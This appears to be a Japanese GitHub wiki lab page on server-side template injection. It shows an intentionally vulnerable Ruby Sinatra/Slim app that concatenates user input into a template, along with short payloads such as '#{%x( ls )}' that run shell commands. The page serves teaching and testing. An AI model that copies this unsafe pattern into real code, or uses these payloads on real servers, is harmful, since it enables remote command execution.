サーバーサイドテンプレートインジェクション

脆弱なソースコード　（ruby Slim）

web.rb

require "sinatra"
require "slim"

set :port,5080
set :bind, '0.0.0.0'

def getHTML(name)
    correct_form = <<-slim
      <html>
        head
          title Example
        <body>
          <p>#{name}</p>
        </body>
      </html>
    slim

    template = '<!DOCTYPE html><html><body>
    <form action="/" method="post">
      First name:<br>
      <input type="text" name="name" value="">
      <input type="submit" value="Submit">
    </form><h2>Hello '+name+'</h2></body></html>'
    return Slim::Template.new{ template }.render
end

get "/" do
  name =""
  if(params["name"]!= nil)
    name =params['name']
  end
  getHTML(name)
end

post "/" do
  name =""
  if(params["name"]!= nil)
    name =params['name']
  end
  getHTML(name)
end

Gemfile

source "http://rubygems.org"

gem "sinatra"
gem "slim"

Dockerfile

FROM ruby:2.3

COPY src/ /home
RUN cd /home; bundle install

攻撃する方法

#{7*7}

#{%x( ls )}

#{system( "sleep 5" )}

https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/tree/master/ruby/ERB

SSTI ruby 02 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード　（ruby Slim）

web.rb

Gemfile

Dockerfile

攻撃する方法

⚠️ GitHub.com Fallback ⚠️

SSTI ruby 02 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード （ruby Slim）

web.rb

Gemfile

Dockerfile

攻撃する方法

⚠️ **GitHub.com Fallback** ⚠️

脆弱なソースコード　（ruby Slim）

⚠️ GitHub.com Fallback ⚠️